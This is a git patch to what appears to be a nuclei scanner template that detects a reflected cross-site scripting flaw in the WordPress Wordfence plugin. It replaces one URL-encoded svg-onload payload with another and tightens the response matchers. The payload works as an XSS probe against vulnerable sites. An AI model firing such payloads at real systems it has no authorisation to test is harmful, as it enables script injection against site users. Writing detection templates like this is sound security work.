From 7019946599227d1b9db9f9b75a231224b627936e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Tue, 11 May 2021 00:29:01 +0530
Subject: [PATCH] Improved matcher

---
 .../wordpress/wordpress-wordfence-xss.yaml            | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)

diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
index 35edb25e89..4a9a1ee7e9 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
@@ -9,14 +9,19 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
+      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<svg/onload=alert(1337)>"
+          - "'>\"<svg/onload=confirm('test')>"
         part: body
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file